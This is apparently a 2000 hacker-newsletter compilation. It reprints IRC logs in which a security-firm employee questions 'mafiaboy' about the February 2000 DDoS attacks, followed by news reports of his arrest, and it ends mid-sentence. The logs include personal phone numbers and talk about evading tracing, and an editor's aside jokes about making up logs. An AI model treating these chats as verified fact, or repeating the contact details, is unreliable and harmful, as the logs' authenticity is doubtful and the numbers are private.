1:07:35 AM [mafiaboy] if they are looking for this person, they sure as hell would be *icee* now that is ALL I CAN SAY until i hear more from you *icee* my docs are this: Michael Lyle, 408-238-3090 *icee* go to a payphone for all the fuck i care *icee* that way, if you really want, you can take the communications out of band. *icee* But before i can talk to you, i need that piece of information. [mafiaboy] one question *icee* sure. [mafiaboy] if you have this info. who have you told? *icee* I can't tell you that, until you tell me the other piece *icee* but i told no one anything that wasn't already out there. [mafiaboy] well no one was fucking msging me an hour ago *icee* look, i'm neither your friend nor your enemy.. i'm an interested party [mafiaboy] brb *icee* I'm much closer to a friend than your enemy, though. [mafiaboy] ok [mafiaboy] since we need to build some trust here [mafiaboy] let's cover some things that don't involve disclosing anything non-public *icee* okay. [mafiaboy] i need to know why people just started msging me. *icee* because information about you was disclosed about you on a news broadcaast by my company. [mafiaboy] you work for a news agency? *icee* i can't tell you where that information was obtained until I build some trust with you *icee* no, i work for a computer security firm. *icee* Please don't wig out at that [mafiaboy] so is that your interest in this? *icee* Not really. *icee* Pieces of it. *icee* If i can benefit myself without hurting you, i'll take advantage of it. *icee* But um, i've been in a situation similar to yours before [mafiaboy] so then, why did you go to the media if no one knew yet? *icee* i can't really talk about that until we build more trust *icee* because everyone already knew-- just no one had broken the story hurt you [mafiaboy] whois everyone? *icee* fuck. *icee* look, i need to know more from you *icee* before i can go into this. [mafiaboy] well wtf *icee* and i need to be on a secure mode of communication [mafiaboy] "everyone" USUALLY includes the media! *icee* i need to be assured you're not calling into a dirty provider *icee* or you need to call me or something *icee* and you need to provide me with that secret *icee* so i know i'm talking to you *icee* here's why: *icee* i'm not doing anything illegal *icee* but the information that i would give you *icee* has no value *icee* if other people get it. *icee* if not, it stops here: I suggest you talk to a lawyer, and I wish you honestly the best of luck. [mafiaboy] so let me get this straight [mafiaboy] 3 days, this is one of the top international news stories. everyone wants to know who is responsible. the fbi and the president make speeches saying they are clueless. You say "everyone knows" and you fucking tell the media???? [mafiaboy] i mean *icee* look [mafiaboy] i'mjust trying to make sure i have the full picture *icee* will you take a valium or something, maybe have a swig of alcohol or three.. [mafiaboy] not that it's me or anything *icee* and just realize the truth here: I'm trying to be your friend. *icee* doesn't put you in any more danger *icee* if i was a fed, and i didn't know who you are [mafiaboy] i think perhaps you should take a step back and think about this from my end *icee* by now, someone would have installed logging access lists and figured out your ultimate source address *icee* and coordinated the data from calling records *icee* and know exactly where you are right now. *icee* Keeping you in the conversation this long would have been enough *icee* but that was not my objective. *icee* nor am i working with the FBI [mafiaboy] i nver said you were *icee* so please realize you're giving me nothing more, and get a secure line of communication with me, and talk to me [mafiaboy] i know you're not a fed. you're with Recourse Technologies in sunny palo alto *icee* I understand it has to be scary as fuck, and i understand i'm not being easy to work with *icee* oh, did you listen to our radio stuff up there in Canada, too? [mafiaboy] you were on the radio too??? *icee* i think they're the only people i talked to who called it sunny palo alto *icee* I am not out to get you. [mafiaboy] who are you fucking Shimomura? *icee* yes. *icee* no *icee* I am not out to get you. [mafiaboy] we don't even know eachotehr and you're already looking for your markoff *** icee has changed the topic on channel #recourse to: *mafiaboy* who are you fucking Shimomura? *icee* No I'm not. *icee* I'm not trying to go down as the person who nailed you *icee* people already did that *icee* And i could tell you more about it *icee* if you'd just fucking talk to me *icee* but listen to why i can't: *icee* if you are not the mafiaboy i think *icee* and i reveal the information *icee* i've destroyed its utility *icee* and then i wouldn't have done you much of a favor now, would i have? [mafiaboy] if i'm already nailed, how come no raid? *icee* do you know what flow stats are? logging access lists? *icee* i can tell you quite clearly how you were nailed *icee* and i can tell you why there's no raid *icee* but i NEED INFORMATION *icee* and the thing is *icee* I'm willing to help you for two reasons: [mafiaboy] it's going to be a while before i can get to another means of communication *icee* I was in a situation once similar to yours, sort of *icee* and I'm hoping that if i help you a bit, maybe you'll help me a little too *icee* well, are you on sympatico now? [mafiaboy] no [mafiaboy] one question though, is it politics? *icee* Okay, then can we take it to DCC? I consider that safe. *icee* why you're not? *icee* yes. *icee* that'll buy you a couple of days at most. [mafiaboy] they're capitalizing off it [mafiaboy] ? *icee* that and the fact the FBI got a little confused *icee* it's the fact that it crosses national borders, and there's difficult procedural problems to solve. *icee* none of the evidence is in .ca *icee* or very little of it. *icee* that and the fact the FBI got a little confused *icee* it's the fact that it crosses national borders, and there's difficult procedural problems to solve. *icee* none of the evidence is in .ca *icee* or very little of it. *** DCC CHAT (chat) request from icee[icee@dragon.ender.com [206.79.254.229:4135]] *** BitchX: Type /chat to answer or /nochat to close >>> icee [icee@dragon.ender.com] requested DCC CHAT from mafiaboy [mafiaboy] won't accept *icee* okay. *icee* how do we do this, then? *** DCC Auto-closing idle dcc CHAT to icee *icee* I'm willing to do it on your terms, within reason. *icee* look, i'm just a 20 year old guy, i'm sitting in my computer room, my girl's sitting here by me, we're eating pizza [mafiaboy] ok. this whole stalling because of politics thing. is that your analysis or do you ahve a source on this? [mafiaboy] (i don';t need your source) *icee* look *icee* This is where it stops *icee* yes i have a source *icee* i can't say any more. *icee* until we get out of band somehow. [mafiaboy] i'm just trying to guage credibility here *icee* look *icee* hint: i used to work for exodus communications. *icee* where is buy.com? where is ebay? [mafiaboy] hmm [mafiaboy] is it an official delay? 2600.com is talking about conspiracy shit *icee* that's where we're getting to things i don't know , but i don't buy it's a conspiracy in my personal opinion to be honest *icee* 2600 isn't worth the paper it's printed on [mafiaboy] that # you gave me, where is it? *icee* San Jose, CA. *icee* It's my main home phone number. *icee* I'm trusting you. [mafiaboy] k, landline? *icee* yes. *icee* it'll be answered on a cordless phone if that's okay *icee* i doubt the feds are outside my house. *icee* And if so, they could just bug the actual line ;P [mafiaboy] 900mhz? *icee* or use LMOS and make it easy *icee* 2.4GHz spread spectrum (CDMA) [mafiaboy] k, call you from prison ;) End log (Remember, if you don't have any real news or real logs, just make up your own! - Ed) --------------------------------------------------------------------------- IRC log started Thu Feb 10 19:23 *** Value of LOG set to ON *** mafia_boy has joined channel #recourse *** Users on #recourse: mafia_boy Telastyn meesh ssorkin @rross icee *** #recourse 949885504 *** mafia_boy has left channel #recourse *** No target, neither channel nor query *** You have been marked as being away *** Signoff by mafiaboy detected *icee* is that you? [mafiaboy] no THIS is me *icee* yah? *icee* so what's up? [mafiaboy] watching cnn, haha *icee* yah? *icee* so did you see me? [mafiaboy] no, just started *icee* Look, here's the deal. ssh to some account somewhere that they didn't know about, or something, so we have a secure channel, so we can talk. [mafiaboy] why [mafiaboy] they dont know about this one, not yet anyway *icee* okay, then let's take it out of band, in DCC. *** DCC CHAT (chat) request received from icee *** DCC CHAT connection with icee[206.79.254.229] established =icee= okay. we talked last night, right? [mafiaboy] yep =icee= (i'm asking because with the circumstance, there's fair odds someone might message me and pretend to be you) =icee= okay, we need to solve this trust problem, and prove you are who you say you are.. so the name of the channel.. it starts with a m. can you tell me it? =icee= #bifemunix is a rival. [mafiaboy] 3090 [mafiaboy] good enough? =icee= okay, that's good enough, but i don't know if that was the brightest thing to say when we could be possibly listened to =icee= Okay: =icee= here's the deal: =icee= the authorities have a large amount of information which has been salvaged from machines taken into evidence, as well as: =icee= flow statistics on routers =icee= routers keep information on all layer 4 connections for the purpose of ensuring quality of service =icee= because the information is kept in the router for a length of time, it serves as a pretty accurate way to see what host has talked to what other host recently =icee= sprint, mci, abovenet, and exds all worked together and put the flow information together =icee= they were also able to correlate information from a number of different sources, like logging access lists on routers =icee= From teh RUMORS i'm hearing, the only thing keeping you out of jail at the moment is geopolitical issues, and the fact that they don't think you're behind all of the attacks =icee= I think the general idea is, they're going to swoop in, get you in custody, and then when you can't talk to anyone else or do anything else, completely fuck you over =icee= So I have a couple of different recommendations, depending on what road you want to take =icee= 1) get a lawyer, surrender to custody, try to plea bargain =icee= or 2) publically make a statement =icee= because if you don't do something now, your ability to talk to the rest of the world is going to be limited =icee= if it looks like you didn't know what the fuck you were doing, things can turn out a lot better =icee= and I have some information, that i certainly can't say over the phone, that could be of great value to your defense attorneys [mafiaboy] and whats in it for you =icee= What is in it for me? =icee= You pick option #1, nothing =icee= You pick option #2, I'd like to be the person who leads you forward. =icee= But that's also up to you [mafiaboy] and then you write a book =icee= I don't want to write a book =icee= i want to sell software [mafiaboy] i have sme software here =icee= what's that mean? =icee= recourse technologies is a softawre company [mafiaboy] haha =icee= The other thing is: i might be able to be a witness in your favor =icee= and I could certainly help in substantiating you didn't launch all of the attacks =icee= I only know for certain you nailed CNN. [mafiaboy] but you dont really =icee= okay, here's the things i know =icee= i know a sympatico ip, and a time; i know everyone says you did it; and i know you use sympatico.ca =icee= or used. =icee= the second set of facts help me more than the FBI; but the first is enough for them to nail you.. see? =icee= btw, don't call me now, i'm not at home. =icee= of course, you could call me at work, 650-565-8601 ext 107 =icee= let me tell you my personal opinions: i think denial of service is lame as fuck =icee= and i don't think what you did was particularly cool =icee= i think you probably didn't realize the implications though, either [mafiaboy] i gotta smoke and walk around a while =icee= *nods* =icee= Just look: =icee= if you think carefully, and don't freak out =icee= you can get community service, and end up picking up trash or something =icee= for 300 hours.. not fun, but better than spending time in juvvie [mafiaboy] oui [mafiaboy] ack [mafiaboy] misfire =icee= re =icee= so, any clue what you're going to do? [mafiaboy] no, i was just talking to a friend on the payphone =icee= bleh, not talking to me anymore? [mafiaboy] i dont think i'm in any danger here =icee= um, why not? [mafiaboy] many reasons =icee= Look: =icee= i don't know if you've heard of me or not =icee= but at one time i was considered the very, very best =icee= and i don't possibly understand how you could consider your position safe. [mafiaboy] why arent you best any more =icee= you have lots of people who are willing to rat on you who saw you demonstrating your might, there's definite information which ties you to a dialup address.. and i don't see what diversion you could have done through the phone system to adequetely protect yourself =icee= I'm best in something different, now. =icee= I do mathematics and analyze networks. =icee= I broke in to things to find out about computers and learn =icee= once i got legitimate access to them, there wasn't a lot of reason to do it anymore =icee= and besides: computer security is a much tougher problem than breaking something to take it down or break in [mafiaboy] you still know ppl in the scene?? =icee= I know a lot of people =icee= but to be honest: =icee= the scene is very lame =icee= 99.9999% today have never written exploit code =icee= i come from a different time, and a different ethic =icee= what we were doing used to stand for something =icee= now it's just not the same anymore. [mafiaboy] dont know much bout thepast =icee= well, i'd like to tell you about it, sometime. =icee= see, i'm sure you've read some shit by the mentor, right? [mafiaboy] but you sound like a friend of mine =icee= i knew the mentor, even hear from him time to time =icee= his name came from the fact that he took an active part in taking people new to the scene, who showed promise, and showed them how to move forward and what to learn =icee= i kinda have had that role in the past =icee= a lot of people who you probably know now have learnt from me =icee= Basically, I've never wanted attention or anything =icee= the only reason i'm on TV now, is the fact that I have 20 people whose livelihoods depend on the fact they've trusted me =icee= and what is good for my company is good for them =icee= to be honest i was terrified to death of it and wanted to go home after the second radio interview =icee= here's the deal though: =icee= i'm your friend, and i'm available to provide you with information =icee= but, these are the conditions: =icee= I am not going to do anything that incriminates myself =icee= and if i get subpoenaed i will cooperate, so you want to limit that which you say to me =icee= and if there's something you can do in the future that benefits me, without hurting you, i'd like you to please consider it. =icee= if you want to come forward, and get your situation known to the public... =icee= then i would like to facilitate that. =icee= but it's jsut if you choose that road. [mafiaboy] see [mafiaboy] i dont know you =icee= *nods* =icee= and there's one last thing: =icee= i have a piece of information which is extremely valuable in your defense =icee= regarding the handling of the case, and a crucial mistake which was made =icee= Look, you've gained favor among a little crowd, but be honest with me, you know that almost anyone could install the tools that you did =icee= I could show any 12 year old who could read how to in an hour =icee= run exploit, compile, install program, put in startup scripts .. rinse, repeat, whatever [mafiaboy] yes but nobody did it =icee= but WHY do it? [mafiaboy] snowday [mafiaboy] haha =icee= right now they're blaming a 500 point drop in the Dow on you; saying you had tens of millions of dollars of economic impact =icee= you think they're not going to put the pieces together? =icee= there's an infinite set of different kinds of information which can be used to nail you; forensic data on the machines you compromised (deleted files; residues in kernel memory if the machine was taken down), there's residues of the information in the routers; in SNMP audit logs in hp openview [mafiaboy] maybe people will invest in something else and the dow will go back up? =icee= RADIUS logs [mafiaboy] but nobody will give credit for that =icee= Hey, you and I both know nothing has changed; the Dow ounced backed today, people will re-invest in ecommerece, it won't really change anythying =icee= but the fact is: Janet Reno has put her career on teh line saying they'll catch you =icee= and the entire FBI reports to her =icee= and like, i don't know if you did etrade or datek, but if you did either of those, you're likely to be particularly fucked. [mafiaboy] no comments [mafiaboy] ;] =icee= well, obviously: i don't want to know. =icee= But i can tell you this: you're definitely fucked on CNN. [mafiaboy] you mean aol? =icee= well, BBN =icee= did you just mean to take down AOL, and nailed CNN, too? [mafiaboy] see above no comments =icee= heh =icee= that's a bummer @HWA 10.8 Mafiaboy:Canadian Feds charge Mafiaboy in DDoS attacks ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Posted 19/04/2000 6:05pm by Thomas C. Greene in Washington Canadian Feds charge Mafiaboy in DDoS attacks Canadian authorities have charged a fifteen-year-old boy with two counts of "mischief to data" for taking part in the distributed denial of service (DDoS) attacks which shut down popular Web sites such as Yahoo!, eBay, CNN and Amazon in February, and which finally brought a healthy scepticism of Internet security into the mainstream consciousness. Royal Canadian Mounted Police Inspector Yves Roussel said they were tipped off when the lad boasted in Internet chat rooms about what he had done. Police obtained a warrant and searched his Montreal home, seizing computers and software and placing the lad under arrest on 15 April, he said. Mafiaboy appeared before a Montreal Youth Court judge on Monday and was released, but with strict conditions. "Considering the seriousness of the charges, and consequences derived from the alleged actions, and in order to prevent further attacks, bail conditions were imposed. Hence, Mafiaboy is prohibited from the use of a computer except at school for academic reasons; and he must be under the direct and constant supervision of a teacher or another [adult] supervisor," Roussel said during a Wednesday press conference. "They liked to show off that they were good at it, and that, you know, they are the best; but it is our evaluation that Mafia boy is not that good, actually. He had a good knowledge of computers; however, he wasn't what we could call a genius," Roussel added. The on-going investigation is a joint operation of the RCMP's Computer Investigation Unit, the FBI and US Department of Justice. More arrests could be made, Roussel indicated, but offered no further details. "Wherever they are, [malicious] hackers will be investigated and arrested," he warned. ® @HWA 10.9 Mafiaboy:Canadian Teen Charged in Web Blitz ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Canadian Teen Charged in Web Blitz _ Some of the Hacked Sites _ Excite: Response times slowed for about an hour and many people were unable to get through. E-Trade: Sporadic morning outages for a day. ZDNet: Offline for several hours one day. CNN: Certain areas of the site stalled for nearly two hours. MSN: Only some customers experienced problems over a two-day period. Amazon: Increased traffic slowed the site. eBay: Down for most of a day. Buy.com: Jammed for several hours. Yahoo: Down for three hours. Source: Staff and Wire Reports Anatomy of the Attacks By David A. Vise and Ariana Eunjung Cha Washington Post Staff Writers Thursday, April 20, 2000; Page A01 A 15-year-old Canadian computer whiz known online as "Mafiaboy" yesterday became the first person to be charged with carrying out one of the cyber-attacks in February that disabled a string of the Web's most high-profile sites. Law enforcement officials said the youth, a Montreal resident, was arrested on the basis of evidence linking him to the attack on CNN.com, which involved flooding the site with so many requests for information that legitimate users were effectively locked out. The officials said they are still investigating his potential involvement in other strikes. U.S. and Canadian agents working on the case declined to comment on the probability of other arrests, but computer experts who have worked closely with them say Mafiaboy is likely a copycat because the assault program he used was so different from the ones used to cripple Yahoo, the first site to go down, and several others. The Royal Canadian Mounted Police (RCMP) arrested the youth at his home on Saturday, seizing all his computers. He was charged with two counts of "mischief" against the CNN site before being released to the custody of his parents, pending trial in Montreal youth court. Because of the suspect's age, his name and address cannot be released under Canadian law. The attacks, which took place Feb. 7 through 14 and also affected Buy.com, eBay, Amazon.com and E-Trade, shut users from around the world out of the news and trading systems they are beginning to depend on, cost corporations millions of dollars, and showcased the vulnerabilities of the Internet. The events caused many to question the security of the vast World Wide Web, although no personal financial information was compromised. Mafiaboy could receive a maximum of two years in a juvenile detention facility and have to pay a fine of about $680, RCMP Inspector Yves Roussel said. But Roussel said it would be unusual for the youth to get jail time: "Even with adults, it's rarely done that a court will impose imprisonment for this crime." As a condition of his release, Canadian police and U.S. Justice Department officials said the young man is prohibited from using the Internet, visiting stores or businesses that have computers, using computers in an unsupervised setting, and associating with three close friends. He is permitted to use a computer at school for academic work, provided teachers watch his every move. He also has a curfew, requiring him to be at home from 8 p.m. until 7 a.m. every day. Investigators are looking into the possibility that other hackers may have been working with Mafiaboy. Roussel said that investigators still had "tons" of evidence seized at Mafiaboy's house to evaluate and that others may be charged later. Joel De La Garza, a consultant with Palo Alto, Calif.-based security firm Securify Inc. who has been tracking Mafiaboy for about a year, said that before the attacks on CNN, Mafiaboy openly asked for and received technical assistance from several other people in an online chat room so that he could break into computers he hoped to use as launch pads for his attacks. Mafiaboy was part of a group of youths who spent hours on a password-protected chat channel called TNT on the Internet's original discussion network, EFNet, which is part of Internet Relay Chat (IRC). His group was a bunch of "script kiddies," a derisive term used for people who use cookie-cutter hacker attack tools readily available on the Web and don't have the skills to create their own, De La Garza said. Indeed, Mafiaboy and some of his friends were known to regularly take down some of the EFNet servers using the same type of strategy that was employed against Yahoo and the other popular sites. "It doesn't take someone with a computer science degree or a vast amount of technical sophistication," said Mike Vatis, head of the FBI's National Infrastructure Protection Center, "but it does take a concerted effort and detailed plan to break in these sites and plant your code and deploy it." The name Mafiaboy arose early in the FBI's investigation. Most of the early evidence linking the alias to the attacks was based on logs of online chats provided by private security experts at Securify, Recourse Technologies Inc. and others. But connecting Mafiaboy to a person and address was confusing because many people use that moniker. Vatis said the FBI's Atlanta and Los Angeles offices helped determine by Feb. 12, or about five days after the computer attacks began, that some of the strikes were coming from a telephone line in Montreal. Two days later the FBI contacted the Canadian police. It took the RCMP one day to identify where Mafiaboy lives, but it then took weeks to determine who in the house was responsible for the attacks. Early on, federal officials, private individuals and curious computer wonks began trolling the IRC networks, popular haunts for hackers, hoping that the culprits would brag about their achievements. Dozens of hackers and hacker wanna-bes did claim credit for the attacks. But Michael Lyle of security firm Recourse in Palo Alto said one person, Mafiaboy, stood out. Lyle said he and other people from his company engaged Mafiaboy in several online conversations. Mafiaboy claimed to have attacked CNN.com and E-Trade, among other sites. Those two sites went down within five to 10 minutes after Mafiaboy announced that he would cripple them, Lyle said. Lyle described Mafiaboy as naive: "I don't think he understood the scope of his actions or the effects on other people. I think it was him saying, 'Boy, wouldn't it be cool to take down sites?' " The discovery of an attack program planted on a research computer at the University of California at Santa Barbara the week after the assaults began turned out to be a pivotal break in the case, according to people familiar with the investigation. In a typical "distributed denial of service" strike, such as the one that disabled CNN.com, attackers first break into multiple computer systems and plant malicious programs they activate remotely. The "zombie" machines act in concert, flooding a target site with requests for information, shutting out real users. The UC-Santa Barbara computer is among the dozens to hundreds thought to have been used in the recent attacks. Kevin Schmidt, a network programmer on the campus, found some extra data packets leaving the school's computer system and traced them back to a hacked machine that was attacking CNN.com. He said the work was "sloppy" and left an obvious trail, which he was able to trace back to a handful of computers in the United States and Canada. FBI Director Louis J. Freeh called the arrest of Mafiaboy a milestone in global law enforcement efforts to battle cyber-crime. "This and other recent cyber-crime successes demonstrate the strengths to be drawn from an international law enforcement-private sector partnership," he said. Among the agencies involved in the investigation was the National Aeronautics and Space Administration, which has often has been the target of hacker attacks. But some facts indicate at least one other party likely was involved in the February attacks. The software programs launched against Yahoo and eBay--the first high-profile sites to be hit--were radically different from those that hit CNN and E-Trade later in the week, according to security experts. The first were significantly more powerful than the latter programs, according to people who have analyzed them, and who believe it makes little sense for the attacker to have switched to an inferior strike method. "That's like saying I'm going to get into a fight and I'm going to trade my Uzi in for a stick," said Securify's De La Garza, who along with Stanford University computer administrator David Brumley has been assisting the FBI. Correspondent Steven Pearlstein in Toronto contributed to this report. © 2000 The Washington Post Company @HWA 11.0 Mafiaboy:Canada Arrests 'Mafiaboy' Hacker, Aged 15 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.washingtonpost.com/wp-dyn/articles/A46086-2000Apr19.html Canada Arrests 'Mafiaboy' Hacker, Aged 15 Reuters Apr 19 2000 7:49PM ET MONTREAL (Reuters) - A 15-year-old hacker, known online as ''Mafiaboy'', was charged by Canadian police on Wednesday with mischief in one of the biggest cyber attacks in history. The charges relate to the jamming of the CNN.com (TWX.N) Web site and up to 1,200 CNN-hosted sites for four hours on February 8. Mafiaboy, who cannot be named under a Canadian law that protects the identities of juveniles charged with crimes, was arrested on Saturday and formally charged on Monday, the Royal Canadian Mounted Police told a news conference. Police Inspector Yves Roussel said investigators were able to track the 15-year-old boy in part because he bragged about his alleged exploit in messages sent to Internet chat rooms. ``This individual, using the nickname Mafiaboy, would have publicized on many occasions that he was the person responsible for those attacks,'' Roussel said. ``The prosecution intends to demonstrate before the court that Mafiaboy is responsible for the denial-of-service attack that was launched for more than four hours on the 8th of February against the CNN site and all the sites that are hosted by this company -- and we're talking roughly 1,200 of those,'' Roussel said. The Mounties charged Mafiaboy with two counts of mischief to data, which carries a maximum sentence for juveniles up to two years in detention and a C$1,000 ($675) fine. Mafiaboy has been released but his bail conditions include not using a computer except for academic purposes and under the supervision of a teacher. He is also prohibited from connecting to the Internet or frequenting stores that sell computers or computer paraphernalia. Police seized all of the computers and related material found at the boy's home. Police said the investigation into the series of cyber attacks that locked up some of the Internet's most popular Web sites in February continues and there could be other arrests. The ``denial-of-service'' attacks in early February shut down such Web sites as Yahoo! (YHOO.O), Amazon.com (AMZN.O), eBay (EBAY.O) BUY.COM (BUYX.O), Excite (ATHM.O) and E-Trade (EGRP.O). Mafiaboy was not charged in connection with the attacks against those sites. The Mounties and FBI declined to say whether they had identified other suspects in the wider investigation involving those sites. ``We had to do something to prevent further actions from Mafiaboy. That's why we arrested him last weekend,'' Roussel said. ``However, the investigation is ongoing and there is literally tons of information to scrutinize. There is a possibility that other people might be arrested,'' he added. Police would not comment on whether Mafiaboy acted alone in the Web assault on CNN's site or was part of a group. They also would not divulge how many computers he may have used. In Washington, U.S. Attorney General Janet Reno said on Wednesday that Mafiaboy must face punishment. ``I think that it's important first of all that we look at what we've seen and let young people know that they are not going to be able to get away with something like this scot-free,'' Reno told reporters on Capitol Hill. ``There has got to be a remedy, there has got to be a penalty.'' Reno said the U.S. government continued to work with industry on that incident and others, now that law enforcement has shown it can crack cyber-attack cases. ``I believe this recent breakthrough demonstrates our capacity to track down those who would abuse this remarkable new technology, and track them down wherever they may be,'' she said. In the February Web site assaults, attackers meticulously obtained remote control of computers around the world. They then used the computers to bombard the targeted Web sites, flooding them with so much data that legitimate users were temporarily denied access or service. Police refused to provide any details that would identify Mafiaboy, or comment on speculation that he attends a suburban Montreal high school. The Mounties' Inspector Roussel downplayed Mafiaboy's computing hacking abilities, saying he likely did not have to devise any special programs to gain access to targeted computers. ``It is our evaluation that Mafiaboy was not that good, actually. He had a good knowledge of computers, however, he was not what we could call a genius in that field,'' Roussel said. William Lynn, an FBI agent who is assistant legal attache at the U.S. Embassy in Ottawa, said investigators were not surprised to discover that Mafiaboy was a juvenile. ``In our profiling of these types of matters it is common for us to consider this as a possibility,'' he told reporters. The Mounties said their investigation included their Computer Investigation and Support Unit in Montreal, a division of the FBI, the U.S. Justice Department and the U.S. National Infrastructure Protection Center. Canadian police joined the hunt for the hackers in mid-February as investigators suspected that a Canadian server had been used in the assault. The February attacks alarmed Internet users across the globe, cost Web sites millions of dollars in revenue and shook the electronic commerce industry because of the apparent ease with which major sites were made inaccessible. ABC's television news division said on Tuesday that investigators were allegedly able to trace the attacks to Mafiaboy by examining the log files of a computer at a University of California, Santa Barbara, research lab that was among those used to attack CNN.com. A hacker electronically broke into the UCSB computer on Feb. 8 and instructed it to send large amounts of traffic to CNN.com's Web site, ABC quoted campus network program Kevin Schmidt as saying. Jeffrey Johnson, chief executive of Meta Secure-com Solutions, an Atlanta-based electronic commerce security firm, said that in such Web attacks, hackers usually use several ''zombie'' computers to which they had already illegally gained remote control to flood the target site with incoming streams of nuisance data. Johnson said Mafiaboy had been well known in the hacker underground and in a popular Internet chat room for about two years. Mafiaboy stood out from others because he often bragged in the online chat room about how he planned to take down a few Web sites. ``He was looking for bragging rights. He was doing it to show that he has power,'' Johnson said. Click here for current stock quotes: TWX YHOO AMZN EBAY BUYX ATHM EGRP RTR/NEWS-TECH-ARREST/ Copyright © 2000 Reuters Limited. All rights reserved. Republication or redistribution of Reuters content, including by framing or similiar means, is expressly prohibited without the prior written consent of Reuters. Reuters shall not be liable for any errors or delays in the content, or for any actions taken in reliance thereon. All active hyperlinks have been inserted by AOL.com. @HWA 11.1 Mafiaboy:Canadian Arrest Made in February Web Attacks ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://abcnews.go.com/wire/US/reuters20000419_1950.html WIRE:04/19/2000 10:10:00 ET Canadian Arrest Made in February Web Attacks MONTREAL (Reuters) - Canadian police were set to reveal details on Wednesday of an arrest made in connection with February's cyber attacks that jammed some of the Internet's most popular Web sites, amid reports the suspect is a 15-year-old known online as Mafiaboy. The Royal Canadian Mounted Police said on Tuesday that charges had been brought against what they described only as "a person" in the cyber attacks. "The investigation has given authorities the opportunity to bring light on Internet attacks that have strongly shaken the heart of electronic commerce worldwide, causing losses that were evaluated at many hundred millions of U.S. dollars," the force said in a statement. The "denial-of-service" attacks on Feb. 2 shut down such popular Web sites as Yahoo! (YHOO.O), Amazon.com (AMZN.O) and eBay (EBAY.O) for hours. In the assault, attackers meticulously obtained remote control of over computers around the world. They then used the computers to bombard the targeted Web sites, flooding them with so much data that legitimate users were temporarily denied access or service. The Mounties declined to comment further on the arrest, but ABC News reported on Tuesday that a 15-year-old boy who used the online moniker Mafiaboy was arrested over the weekend in the Montreal area and charged on Monday. The news division of the U.S. television network said records in the case had been sealed because of the suspect's age. Under Canada's Young Offenders Act, authorities are not allowed to reveal the identities of individuals less than 17 years of age who are charged with crimes and set to be tried in juvenile court. The Canadian police promised to release more information at a news conference in Montreal at 10:30 a.m. EDT (1430 GMT) on Wednesday. The U.S. Justice Department and the FBI were expected to make a statement afterward. No comment was immediately available from the department. The Mounties said their investigation included their Computer Investigation and Support Unit in Montreal, a division of the FBI, the U.S. Justice Department and U.S. National Infrastructure Protection Center. Canadian police joined the hunt for the hackers in mid-February as investigators suspected that a Canadian server had been used in the assault. The February attacks alarmed Internet users across the globe, cost Web sites millions of dollars in revenue and shook the electronic commerce industry because of the apparent ease with which major sites were made inaccessible. ABC said investigators were allegedly able to trace the attacks to Mafiaboy by examining the log files of a computer at a University of California, Santa Barbara, research lab that was among those used to attack CNN.com (TWX.N). A hacker electronically broke into the UCSB computer on Feb. 8 and instructed it to send large amounts of traffic to CNN.com's Web site, ABC quoted campus network programmer Kevin Schmidt as saying. ABC News said the FBI obtained chat room logs allegedly showing that Mafiaboy had asked others what sites he should take down before they were attacked. Internet security expert Michael Lyle told the network he had communicated with Mafiaboy and the 15-year-old said he had attacked not only CNN.com but also E+TRADE and several smaller Web sites. A subscriber called Mafiaboy previously held two accounts with Delphi Supernet, a Montreal Internet service provider that Toronto-based ISP Internet Direct bought last year. The accounts were closed in March 1998 because Mafiaboy violated subscriber policies, but Internet Direct would not say what the violations were. @HWA 11.2 Mafiaboy:Reno Says 'Mafiaboy' Hacker Must Face Punishment ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://my.aol.com/news/story.tmpl?table=n&cat=01&id=0004190119676550 Reno Says 'Mafiaboy' Hacker Must Face Punishment Reuters Apr 19 2000 1:19PM ET WASHINGTON (Reuters) - U.S. Attorney General Janet Reno said on Wednesday a 15-year-old boy arrested in Canada for jamming the CNN.com Web site and other sites in February must face punishment. Canadian police in Montreal announced charges against the 15-year-old hacker known online as ``Mafiaboy'' for jamming the CNN.com Web site and up to 1,200 CNN-hosted sites for four hours on Feb. 8. ``I think that it's important first of all that we look at what we've seen and let young people know that they are not going to be able to get away with something like this scot-free,'' Reno told reporters on Capitol Hill. ``There has got to be a remedy, there has got to be a penalty.'' Reno said the U.S. government continued to work with industry on that incident and others, now that law enforcement has shown it can crack cyber-attack cases. ``I believe this recent breakthrough demonstrates our capacity to track down those who would abuse this remarkable new technology, and track them down wherever they may be,'' she said. @HWA 11.3 Mafiaboy:FBI Has Evidence That He and Others Launched Web Attacks, ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://more.abcnews.go.com/sections/tech/dailynews/webattacks000216.html ‘Mafiaboy’ Suspected FBI Has Evidence That He and Others Launched Web Attacks, Expert Says A customer peruses computer wares for sale at a hacker convention. The FBI is questioning hackers, computer security experts and others who might have information on last week's Web attacks. (Lori Cain/AP Photo) By Jonathan Dube Feb. 16 — A hacker who calls himself “mafiaboy” is believed to be responsible for at least two of the attacks on leading Web sites, a security expert tells ABCNEWS.com. FBI seeks hackers in Web attacks. Chat room logs now in the possession of the FBI show that “mafiaboy” asked others what sites he should take down — before the sites were attacked, Internet security expert Michael Lyle said. In a later conversation with Lyle, mafiaboy claimed credit for attacking CNN.com, E*TRADE and several smaller sites, and he shared technical information that only someone involved in the attacks would know, Lyle said. The FBI now has reason to believe that the attacks last week that took down seven leading Web sites and at least six smaller Web sites were launched by several people, acting independently. Mafiaboy, who has been described as a 15-year-old Canadian, is believed to be a copycat who launched his attacks only after Yahoo! was knocked offline on Feb. 7. Mafiaboy’s Claims Seem Credible Dozens of hackers have claimed credit for the attacks in online chats, but Lyle says mafiaboy is the only one so far who appears to be credible. “Mafiaboy was saying ‘What should I hit next? What should I hit next?’ and people on the channel were suggesting sites, and mafiaboy was saying, ‘OK, CNN,’” said Lyle, the chief technology officer for Recourse Technologies Inc., an Internet security company in Palo Alto, Calif. “And shortly thereafter the people on the channel would be talking about CNN going down. If you look at the time stamps on the logs, they also coincide with CNN going down.” Lyle said the log files show similar discussions prior to the Feb. 9 attacks on E*TRADE and several other smaller sites. Chat room log files can be faked, but Lyle said 